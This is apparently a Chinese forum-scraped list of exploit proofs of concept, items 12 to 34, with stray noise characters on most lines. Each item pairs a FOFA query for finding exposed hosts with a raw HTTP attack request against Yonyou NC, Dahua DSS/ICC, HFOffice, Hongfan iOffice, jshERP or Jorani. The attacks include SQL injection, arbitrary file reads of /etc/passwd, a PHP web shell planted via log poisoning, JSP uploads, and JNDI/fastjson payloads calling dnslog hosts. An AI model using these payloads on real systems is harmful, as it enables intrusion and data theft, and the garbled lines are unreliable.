9 u! j% V& S9 c- zGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
6 S) m% L" D# F! q3 F @9 M1 ?Host: 127.0.0.1
q, C3 U& H \' t6 i% q6 cPragma: no-cache
' F( I* \. H' {! L: \. ^Cache-Control: no-cache
* \8 _# y' C2 u3 c9 e2 l% fUpgrade-Insecure-Requests: 16 N2 w( E e5 u" T' w" G7 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36/ M W1 s3 ^4 a% c$ i' t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% J7 H0 F3 M5 ]$ _& ^: P3 \1 T
Accept-Encoding: gzip, deflate
/ j( z s/ P c5 q: x6 _* D* wAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
5 [1 R5 w) M! C* Z& }6 f2 e& JConnection: close: o! }8 J4 L2 ?1 i5 h
4 e# i$ q: {2 q9 X1 ]& Z6 A$ G+ I. s+ |+ d W' K
12. Jorani < 1.0.2 远程命令执行
+ ^# o4 c+ C: S9 L; UFOFA:title="Jorani"
7 c9 q. {0 _7 a6 f) T8 @/ o第一步先拿到cookie
# r+ @6 |- x! B5 H. j8 N5 C: h7 WGET /session/login HTTP/1.1
2 I4 T. \+ ~; v! THost: 192.168.190.30& A0 X) f4 O" _. t: l6 ?
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
1 a; b" a$ _ f8 TConnection: close, H, M, G1 X- b( D6 w$ J: G! O
Accept-Encoding: gzip
% x7 D- V/ F6 P7 `, p8 w2 ?/ _. g/ ]% T) I1 [% _
" G, T4 p; }# ^7 v/ G; S响应中csrf_cookie_jorani用于后续请求
6 r+ _) |, J. |HTTP/1.1 200 OK- c* T0 W& S5 P
Connection: close! m/ V: |. Y& n7 V8 I" c+ X
Cache-Control: no-store, no-cache, must-revalidate
5 B \. M- B" u2 H; g Y, gContent-Type: text/html; charset=UTF-8
5 U& S% X: w p2 m0 B7 Q1 Z3 ADate: Tue, 24 Oct 2023 09:34:28 GMT# |, B9 U! ]% C! S5 y
Expires: Thu, 19 Nov 1981 08:52:00 GMT9 T2 Q0 j1 _1 u7 c x* t2 G5 u
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
2 i: `% e/ U% W; HPragma: no-cache- r8 \/ T, \. @& j& N5 R- f3 i* P
Server: Apache/2.4.54 (Debian)
/ E; i0 g" B, H! A" B7 J% P+ D8 nSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
3 w0 f. G9 U: W7 z( y, M s( ]4 ^+ U% YSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
) E7 A& ^" q' i+ t. y, UVary: Accept-Encoding0 b; v' O2 G/ q: Y8 F
+ p& Z5 A h2 s. z
. ^ L$ i/ b: L( Z4 ^POST请求,执行函数并进行base64编码
/ {- X. D0 [8 {POST /session/login HTTP/1.12 W( c `. q* N; i- @
Host: 192.168.190.30* d' ]) R+ l+ d7 v& r Z( Z0 M, S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
2 A$ G) f. M U% @Connection: close
6 g8 i S6 t1 iContent-Length: 252+ t5 }3 f* T7 j& D+ _" g* |4 u
Content-Type: application/x-www-form-urlencoded* D. u/ T4 B! t
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r& o1 r; h$ `- q9 d
Accept-Encoding: gzip
, m- l/ U6 Z* V$ p, R8 h6 t: Z8 J/ S
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor! c! [- n$ h* k1 ^, J0 A2 n) l% ?" D
4 W9 E3 y% ~ v
/ H/ L" ~/ C$ G+ A+ M; W5 W. ^
' d. j: d1 w" d) d0 O2 t) ]
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串9 S# U& O- [' d
GET /pages/view/log-2023-10-24 HTTP/1.1, c/ V% q$ W6 _
Host: 192.168.190.307 {+ d4 e0 ~/ F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.364 O; L1 _' K7 F6 W. s
Connection: close
6 @- ^/ E& e! D F. v; y5 vCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r3 S% R2 X0 Q/ l2 }# D- Y
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
: l( v- J3 m) _) h. E4 J/ |X-REQUESTED-WITH: XMLHttpRequest
& R) k9 V$ Q/ C6 h7 W9 {Accept-Encoding: gzip
9 U; g2 q4 h' E3 [
7 h) X. E: S ]4 Y" v. ?: s" G0 [* z! X$ L
13. 红帆iOffice ioFileDown任意文件读取 ]! o% z! }, P) s4 I Q; M' y
FOFA:app="红帆-ioffice"+ L7 H* w {3 k6 j) q
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
) A6 E0 X3 H' i R6 H( c) @. MHost: x.x.x.x1 X/ ?9 _9 d. q+ M& O# p
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
* i9 B0 U" ~; k% f4 Y5 GConnection: close
2 B% j6 g5 R& \/ a, c* E: ^Accept: */*
7 r Z# m) J( L7 `2 Z1 o# d: X8 H' dAccept-Encoding: gzip/ ~3 q/ V ?2 B5 z
P' |! b: |; p% X
& [( S& ^; h( Z, D5 E14. 华夏ERP(jshERP)敏感信息泄露. s7 J+ M; `; q+ A* S2 H
FOFA:body="jshERP-boot"
+ g* z8 Y/ I* N; e3 j泄露内容包括用户名密码
5 S S% q4 ]7 h: S LGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
0 @) n3 ? ?$ i6 a8 |3 l3 k) C; OHost: x.x.x.x
% N. o, H1 G. n }# t5 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
" e$ I% [6 [: I7 h6 kConnection: close5 ~. }* w) u# Q: o2 x, y2 V1 X p+ _ `
Accept: */*
6 i* B7 T/ @! D, dAccept-Language: en0 l2 a# O; N' K0 T0 E
Accept-Encoding: gzip0 r9 o4 `, I% K9 i
. ^% H) e; y s3 A2 h2 K
+ U' _" W) s; `- L# O
15. 华夏ERP getAllList信息泄露
" `" a( w) q: p$ |CVE-2024-0490
+ F2 v( G; k; H! Z, @# U f/ e) {$ sFOFA:body="jshERP-boot"
- y& l- s5 p9 ~0 J" n) b' w$ W# }泄露内容包括用户名密码8 f5 Q- k8 E! Q1 O0 V+ T. h b9 [7 x) S; g
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.19 K$ D+ `% {' j# C+ K! J' U
Host: 192.168.40.130:100
' S) N/ X6 O( A9 gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
' Y! u# r, G9 ]& N7 p: @, b7 UConnection: close
) T0 R* v$ o' s# @' \ @; M. m1 EAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8# W1 d8 |" |1 I6 z. _7 j; C0 ]
Accept-Language: en
) v( |2 l) \, N. e1 i( rsec-ch-ua-platform: Windows f. m. [1 H' R
Accept-Encoding: gzip) Z3 X1 V5 P/ M8 D. s; B
2 n% n+ _# W1 O' J1 P; ^& r }
( E- u0 B$ R9 j
16. 红帆HFOffice医微云SQL注入' ?+ u4 i! E% V; G
FOFA:title="HFOffice", H$ g; R; L: x7 X) m
poc中调用函数计算1234的md5值
. z! B& Y7 M R0 m' S. LGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
; L0 S8 p+ w; B, I; uHost: x.x.x.x0 d4 {1 V. ^1 ]5 O& s3 l/ f! j' `2 \
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
( T: h8 y: J& ^2 O3 C8 gConnection: close. I) ?6 @9 G9 P( _: ?! s4 Q9 o
Accept: */*) Y1 h9 r6 P, V& E$ t* C& D
Accept-Language: en* O" I2 _& V. \: E
Accept-Encoding: gzip* x$ t) T% f; w, Q1 [- m
3 Z8 @$ ?, v+ a; f6 b5 Z' G* j, z, }
$ m) E2 T5 y% Z% ~0 U7 W& ~! g# P3 J p17. 大华 DSS itcBulletin SQL 注入7 z1 |7 {, B8 }) \
FOFA:app="dahua-DSS"7 ~& O- }' l: S$ ~( E' T6 m) H
POST /portal/services/itcBulletin?wsdl HTTP/1.1
4 T1 \+ W/ d' k/ kHost: x.x.x.x& r b! K/ ?9 P4 I) C9 v4 S0 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" ?# o) i, S1 c
Connection: close+ L5 ~$ D8 }0 I6 q2 k
Content-Length: 345
' n' F7 n3 ]* b1 JAccept-Encoding: gzip
2 ?) r/ J' n: q" ]3 x' p
1 r% H! @' g9 C1 S" [2 C<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>2 L. m& ]8 k. p O2 ?
<s11:Body>
3 v" L8 D; ?6 d$ p0 }8 j- H; p& G$ @ <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
1 L8 P5 ~* H8 t <netMarkings>' A" ^0 H: B" ]
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1* K8 S: V% Q! @* R5 a0 ?( s; f: L
</netMarkings>; a( u& F5 A) }: N* \
</ns1:deleteBulletin>
$ a C4 W9 S- y3 x: b </s11:Body>
' I. m- m1 I4 d4 l* Y0 y</s11:Envelope>1 G1 b- ` @$ P. _+ w( h9 J0 L
* c1 q3 g: [0 s) T5 G1 L
0 r( Y% V Z% g7 z; Y8 z18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
1 p& e0 Q/ c' ]. TFOFA:app="dahua-DSS"3 e' ^# c7 H ]
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.11 M5 r5 @3 @2 F8 l
Host: your-ip. f. A0 x# k+ V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% ~3 c6 x# m7 Q* n- k$ W2 z/ G5 @
Accept-Encoding: gzip, deflate6 N7 h y2 G* Z; W! d, Q* u
Accept: */*) \7 ]3 _: v$ C+ ]9 u
Connection: keep-alive
# C2 ]* I( b9 ~# i c2 r4 l. B
/ ~/ V9 ?& k3 q$ Z/ d8 G Y# v }. v" I: f0 a( `5 I. _' F
, w/ ~, [5 O5 J; J# f3 \$ b
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入& G% a( l3 M1 q# g% [
FOFA:app="dahua-DSS"6 h0 U1 I5 s% ~
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1( T I! v: [9 @4 |
Host:1 }: J% y9 n& }3 Q- g Y
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
; H0 x) M. u+ C4 EAccept-Encoding: gzip, deflate8 L* E; |& h9 M( g3 y r
Accept: */*
" }5 d; k! |( TConnection: keep-alive
. [ {) L1 @5 a1 Y0 ], J* ~
' s$ a2 A* {! K% Z) ~2 |! |: W- v7 d: O H" i# O
20. 大华ICC智能物联综合管理平台任意文件读取3 B1 O& @! c% q7 E; M% f; ?" b$ }% K, u
FOFA:body="*客户端会小于800*"; \: r+ o+ R) B [" o
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
# N7 p5 o5 S* c+ A8 s. m& @+ n$ n- q. E- kHost: x.x.x.x, {* B5 i" n/ S
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( G X; ?7 A4 S" u/ z3 B' z; NConnection: close
+ ?3 i- n. n7 z" @& S( }Accept: */*
q; h9 N8 s" B3 H4 b/ RAccept-Language: en5 i/ J3 g& |3 Y6 f8 i3 a% `+ w
Accept-Encoding: gzip
0 o Z. O; G6 v" w3 |* A! V1 t* X5 X8 Z7 \
& G$ N$ _) l4 L9 t( T4 a) Z1 b
21. 大华ICC智能物联综合管理平台random远程代码执行+ r3 R" E, t% h0 B
FOFA:icon_hash="-1935899595"; d* a' y, C) }2 k$ h7 R
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
+ s2 g6 g) f3 q# e: ?0 sHost: x.x.x.x
0 S& |2 i2 r- K9 w. R2 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 r% R5 f+ P: `4 v' IContent-Length: 161# j7 G$ {& Q4 W0 ~
Accept-Encoding: gzip
( q0 v6 Y$ g1 _3 `- y1 ]" }Connection: close
& A0 b$ w, {) d: r. t$ vContent-Type: application/json;charset=utf-8
3 C4 m5 p" ^* b9 f1 O4 l1 G5 J1 q: Y! G3 t) n0 S
{5 t. m% w4 l! L5 n1 N, o
"a":{
8 b& P+ J1 ?, U$ d- O/ C "@type":"com.alibaba.fastjson.JSONObject",
6 T, W: M* q3 t2 b: X1 W: f( Y z {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}+ j5 ]$ l6 E$ w+ W9 r
}""8 F/ ]( E% g. d9 c, Y/ c8 n
}) @1 R4 l8 p, |* e
( x. F( ^- m. O8 o, V! |0 D
1 f% ^5 d# T! l5 Q3 q22. 大华ICC智能物联综合管理平台 log4j远程代码执行5 H8 [1 S6 k D+ M# S
FOFA:icon_hash="-1935899595"7 p% G, O9 y) U; P$ K5 w
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.12 {" Y, Q* @2 d, n3 p7 [, }8 s6 ?! c
Host: your-ip
) `% Y: Y7 \+ r; [2 g( |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 Z6 C7 {3 F' j6 k
Content-Type: application/json;charset=utf-8
; f7 i- P" U7 X5 b5 Q3 e7 }
& [4 j# \2 b) ^& d- ]; g! M9 h( g{9 z2 S0 z7 W' ?& _
"loginName":"${jndi:ldap://dnslog}"
+ I( Y* i& U: [! ~}, t& o P: F$ r& I, P" F: x
) X0 Y7 N! A4 i, _3 i0 T' E+ e2 H$ k1 j r1 |: {0 q ]
8 \+ L1 D1 i/ _- ? v
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
+ e# _3 ^6 a, W. jFOFA:icon_hash="-1935899595"
! e0 H# {. K( I7 R. p0 VPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1# L8 b: p+ C( ?5 ~" M
Host: your-ip9 K/ l( o0 d# B$ W' h* g# S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: l% ?2 Q) O5 j2 V5 y
Content-Type: application/json;charset=utf-8
; f% X7 Q: P6 Z: D0 W. e1 wAccept-Encoding: gzip
; H* x, z( p( b# R" d) h% B- tConnection: close
9 ~: w5 H% @0 p% r+ r) v" N
5 B }: Z/ w2 N$ d{7 H& b+ u4 q; t; _
"a":{8 Q; y v3 O% q
"@type":"com.alibaba.fastjson.JSONObject",6 S2 E- A' N) V) o, M9 I Q
{"@type":"java.net.URL","val":"http://DNSLOG"}6 ~* n0 d& O% H9 W5 P, f
}""7 I7 l8 u2 U1 B7 C {( B
}9 _4 E: ~3 E7 v' j! C6 _6 ~2 D% Y
0 e1 i2 C7 d4 a( c
# {( [' l3 I6 N24. 用友NC 6.5 accept.jsp任意文件上传5 t' y1 d& U3 t [3 O9 ]
FOFA:icon_hash="1085941792"
; V4 _* T4 Q& h A! ~POST /aim/equipmap/accept.jsp HTTP/1.1
7 }9 j" r% m7 ^Host: x.x.x.x
5 `3 R, v) N- E0 nUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
' p% Z; K3 u3 v0 {6 j, q: z# sConnection: close9 X( r0 l, H* `/ _2 {* G
Content-Length: 449
; I8 W `5 ], ]. m( d" |+ J Z' JAccept: */*
5 y' X- d( r! gAccept-Encoding: gzip/ u& i2 O* `' H1 R- s/ z, D, g% x1 o
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc3 Y: {5 V8 s1 K* B) B
0 V% ?, s4 f/ L! z2 c1 \5 U- q-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc4 H; i5 ?3 y( G. u! d) ^3 {! E
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"7 m* ~2 M9 Y+ a; j& S
Content-Type: text/plain9 v: O) F. Y/ c( E
: M7 o( \9 ]# b6 |
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
+ Y+ h: `5 m3 N-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
0 x' S% S& G" I; hContent-Disposition: form-data; name="fname") H, ^+ o% _- v! n, F- }! j
4 @; }9 p$ D, W\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
# b3 I5 f1 t0 @7 _4 d-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--$ }$ A. n( F: _7 d
1 X& L. H E% v ]* Q- A9 q- G
/ Q9 ?9 O4 |$ [% J" E& ]
25. 用友NC registerServlet JNDI 远程代码执行
0 _ p3 R2 B) v1 b/ eFOFA:app="用友-UFIDA-NC". U8 `9 W% E9 A, T) N- e
POST /portal/registerServlet HTTP/1.1, e5 C6 T' z+ P& g8 \8 E$ t# d! p
Host: your-ip& Q4 I5 q/ y; N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
; ?& w9 U1 f; V! {, K2 XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9& U {7 j0 ^* L# T/ N# T6 P% }
Accept-Encoding: gzip, deflate
! A* c2 i$ @2 c8 ]Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
1 W/ Z1 z5 I) A6 ]# QContent-Type: application/x-www-form-urlencoded
4 K6 _* Y& W: D" n" P+ Q0 ?8 \
: h$ j, R- h& _2 p. }7 @type=1&dsname=ldap://dnslog
* R! W% y: Q: G+ }2 X! P: ?& ~& t% V6 m, p/ E: o/ M; u/ M
2 E; s( h N# }/ a" q) Y/ Y4 j
3 q: E \. Q) y7 T' V5 I26. 用友NC linkVoucher SQL注入8 _% ~2 k- S- B' b, C
FOFA:app="用友-UFIDA-NC"
" d% ^9 `- G# P7 L6 J/ j$ hGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1: R* `7 B6 e# J/ I7 `
Host: your-ip
0 u+ q, C, j( f& L, ^$ V# XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: w3 O1 U% P$ Y& c) l2 CContent-Type: application/x-www-form-urlencoded
4 O* ] v8 {8 D: SAccept-Encoding: gzip, deflate7 P( P' U( J3 s$ K, Q1 `
Accept: */*
" ]! F6 m, a t7 EConnection: keep-alive+ X) F1 U; n/ k9 K/ K
! ^& w; n' ?8 J) i; A
, Q! f v2 D& z27. 用友 NC showcontent SQL注入
6 b, z6 m: g; D5 dFOFA:icon_hash="1085941792"( \6 s, |1 u- K4 H( g
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
& |% n6 [% z0 s5 _( ^* _Host: your-ip
0 Z" x/ g# v6 l8 [" n S/ U3 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" E* V: H% ^/ I# H7 ]: sAccept-Encoding: identity
% U. l+ U% c, Y" DConnection: close$ d# l% g, T( q/ `2 v. ~
Content-Type: text/xml; charset=utf-8
2 G+ F7 M- r8 {
. P, j8 B5 d3 G$ u, p7 Z2 {/ z9 _6 ^& i+ [7 `$ b/ i) T
28. 用友NC grouptemplet 任意文件上传
/ O7 {6 s% |- ~/ _6 K3 O2 E# IFOFA:icon_hash="1085941792"8 i/ W2 v: Q) U
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.10 L+ r0 ]8 y5 T; k
Host: x.x.x.x
1 y0 `- x( I" S5 G0 }( u- VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
+ N. d: ]& m& wConnection: close
' X2 e; \! K) ]1 r, X: tContent-Length: 268% P: M0 O/ D( v1 U1 x
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
7 [( u# h& Y# `Accept-Encoding: gzip8 W4 f* W0 x+ `) g! X
/ m; T& |. Z& F. v' ^4 a------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
7 Q/ b0 b# n4 K; \9 bContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
7 [$ T+ q5 h2 R9 o& vContent-Type: application/octet-stream7 \3 y- O8 g+ ?, r0 c( ?/ L
4 y6 d' Y' u( l
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
( k6 C) h" Y. w4 r3 J. J7 d7 {------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--' ]8 u+ e f7 Z
# T, G* U& |& e& V
$ M# F1 w% T x7 @
/uapim/static/pages/nc/head.jsp- g+ \3 ]# ^ v6 b% k. O% K
+ G+ l4 M: o q7 {( U& o29. 用友NC down/bill SQL注入
, A( i: M; T5 ~6 NFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"5 G7 o1 c6 v, W. G
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
5 c+ j( A# |* Y0 UHost: your-ip
' H- e; i" C2 Z, ^' nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 O/ N/ m- j/ L+ J% ^" a" H! Q% F3 w
Content-Type: application/x-www-form-urlencoded& z: Z5 t! p! q I
Accept-Encoding: gzip, deflate
$ f7 s# A) G0 r+ {3 p; W$ @) R- eAccept: */*4 k1 M2 ~) Q: N X* s
Connection: keep-alive
' f* n3 v4 L# t Z9 F( c0 i1 t
8 z$ q7 a0 }4 ]
( F8 V3 y, i& x* X. u/ a" g30. 用友NC importPml SQL注入) z+ k9 L9 M3 J( q v8 h9 d& Q$ O$ a8 \
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
! D$ W+ j& [/ p$ O- ?POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
+ p' U( ~/ O6 k: i4 P: ?Host: your-ip* G9 m6 [% w% \3 `! O+ Q- g
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V/ Q( T/ w( H0 ~5 Z$ N3 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
/ I: I! ~1 ?, K, V7 A0 B, j' tConnection: close6 w# G; l; T- d' J2 j
, ^* y9 ?' x6 O5 o/ l
------WebKitFormBoundaryH970hbttBhoCyj9V
; d2 _9 f1 e9 t iContent-Disposition: form-data; name="Filedata"; filename="1.jpg"2 m. w, x1 f. c6 W2 R) j7 e0 m( G
Content-Type: image/jpeg
) O# K( k7 B6 Z------WebKitFormBoundaryH970hbttBhoCyj9V--
: \/ Y( Z+ k. w3 `2 X3 A, L
1 Q4 O8 r, M% S! k" z: U
" Y d& `! d( h7 K7 N$ Z# E' M4 H31. 用友NC runStateServlet SQL注入
% ?$ G& \' [+ e( k) J F9 _0 Rversion<=6.53 O* T& r" A" w. } g
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"6 s6 n5 Q3 g* i
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
6 \- z% u+ f+ p+ z6 oHost: host2 p( x3 s3 {" s" q. _9 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
( \; c) Z9 k4 ^' Z" P; \Content-Type: application/x-www-form-urlencoded
& k7 p, F8 ^ G( H- E/ ~7 ]- X
! H4 c$ |3 W6 z0 Y" k
8 g# E! {% A l( J9 `32. 用友NC complainbilldetail SQL注入' r2 c$ T8 }6 _; |
version= NC633、NC65
8 t! X1 e' K8 o% Y3 X+ O" Z* PFOFA:app="用友-UFIDA-NC"2 A# O* l' O8 U& i: a1 E! M8 g
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1& B2 X' ^! i" g8 J2 X
Host: your-ip% c: K( Y8 W" r' m, E% P0 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 ]3 N% f! ~) w: xContent-Type: application/x-www-form-urlencoded
+ ]4 ^! W) M- I D8 hAccept-Encoding: gzip, deflate% a4 z/ D1 U, h2 k, D
Accept: */*
. y! D) ~5 M: h4 z) g% Q. N" kConnection: keep-alive
& x" k* J! V" ?4 X7 _. i0 X
) N/ n% L/ P, C8 `* p# r7 ` |
+ H( h& [# F* f- I# U9 b' ?/ C33. 用友NC downTax/download SQL注入
* o1 V: S O5 W1 ?; |: \. [version:NC6.5FOFA:app="用友-UFIDA-NC"
1 F, R0 ^- N( P$ `* e$ l2 W. ?GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
- D! U& \8 I d& B+ CHost: your-ip8 W4 b) z1 e7 [! I7 n0 k6 G. o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 N# |0 Y" H( L; LContent-Type: application/x-www-form-urlencoded& t& Q; R& O+ y. T1 M
Accept-Encoding: gzip, deflate3 N) h) V# q; t, V( `, y% G8 |* k
Accept: */*0 c" x% H A3 H& z+ d
Connection: keep-alive
: Y. F& @ i7 d/ I* i8 C: T7 i0 j/ c0 [5 I$ `
( D# M* \& f9 n) u$ A6 `
34. 用友NC warningDetailInfo接口SQL注入
7 }6 y. }, d# ? }FOFA:app="用友-UFIDA-NC"
4 I+ N: j1 q+ e K/ C! D$ xGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1# d. F/ A h3 g: Y
Host: your-ip
# c% h8 p. a9 r% D$ y/ ]/ rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 t" r7 l. L/ \7 S+ `$ N' ^Content-Type: application/x-www-form-urlencoded3 V/ o& X, {% A
Accept-Encoding: gzip, deflate: Q$ }5 I" i7 K& q
Accept: */*
% O7 m0 B2 n T5 Y( EConnection: keep-alive- }$ C. K! q, x+ `3 y
a' B' t; T! ?" k+ Q: d, F
